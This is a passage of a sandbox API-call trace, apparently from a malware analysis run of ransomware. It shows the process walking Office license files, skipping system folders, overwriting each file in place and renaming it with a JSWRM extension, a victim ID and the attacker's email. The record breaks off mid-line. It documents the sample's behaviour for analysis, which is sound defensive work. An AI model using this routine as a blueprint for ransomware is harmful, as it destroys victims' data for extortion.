ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ad0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ad0, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.134] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ad0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ad0, lpOverlapped=0x0) returned 1 [0107.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.134] CloseHandle (hObject=0x45c) returned 1 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0107.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0107.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0107.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.135] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0107.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.136] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe89c5db2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe89c5db2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8aaac09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="PROFES~4.XRM")) returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.136] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0107.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0107.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0107.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0107.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0107.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0107.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0107.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0107.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0107.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0107.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0107.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.137] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11674) returned 1 [0107.137] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0107.137] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.140] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0107.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.140] CloseHandle (hObject=0x45c) returned 1 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0107.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0107.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0107.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0107.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.140] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0107.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0107.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.141] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8894afa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8894afa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8a12285, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x59ac, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_Grace-ppd.xrm-ms", cAlternateFileName="PROFES~3.XRM")) returned 1 [0107.141] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0107.141] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0107.141] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0107.141] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0107.141] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.142] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.142] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.142] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.142] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.142] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.143] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22956) returned 1 [0107.143] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59a0) returned 0x24c1d0 [0107.143] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x59a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x59a0, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.145] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x59a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x59a0, lpOverlapped=0x0) returned 1 [0107.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.146] CloseHandle (hObject=0x45c) returned 1 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0107.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0107.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.147] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8848637, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8848637, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe88e0fbb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_Grace-ul-oob.xrm-ms", cAlternateFileName="PROFES~2.XRM")) returned 1 [0107.147] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.147] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.148] lstrcmpiW (lpString1="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 